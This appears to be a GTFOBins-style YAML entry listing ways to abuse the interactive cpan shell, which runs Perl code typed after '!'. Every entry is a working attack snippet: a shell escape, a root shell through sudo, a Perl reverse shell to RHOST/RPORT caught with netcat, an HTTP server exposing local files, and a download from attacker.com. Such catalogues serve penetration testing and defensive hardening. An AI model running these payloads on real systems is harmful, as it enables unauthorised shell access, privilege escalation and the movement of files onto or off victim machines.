---
functions:
shell:
- description: |
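The interactive `cpan` shell evaluates any line that starts with `!` as Perl code (`! command`), so being able to run `cpan` is equivalent to being able to run arbitrary Perl.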
code: |
cpan
! exec '/bin/bash'
reverse-shell:
- description: Run `nc -lvp RPORT` on the attacker box to receive the shell.
code: |
export RHOST=localhost
export RPORT=9000
cpan
! use Socket; my $i="$ENV{RHOST}"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};
file-upload:
- description: Serve files in the local folder by running an HTTP server on port 8080. Install the dependency via `cpan HTTP::Server::Simple`.
code: |
cpan
! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
file-download:
- description: Fetch a remote file via an HTTP GET request and store it in the current working directory (`PWD`).
code: |
export URL=http://attacker.com/file_to_get
cpan
! use File::Fetch; my $file = (File::Fetch->new(uri => "$ENV{URL}"))->fetch();
sudo:
- code: |
sudo cpan
! exec '/bin/bash'
---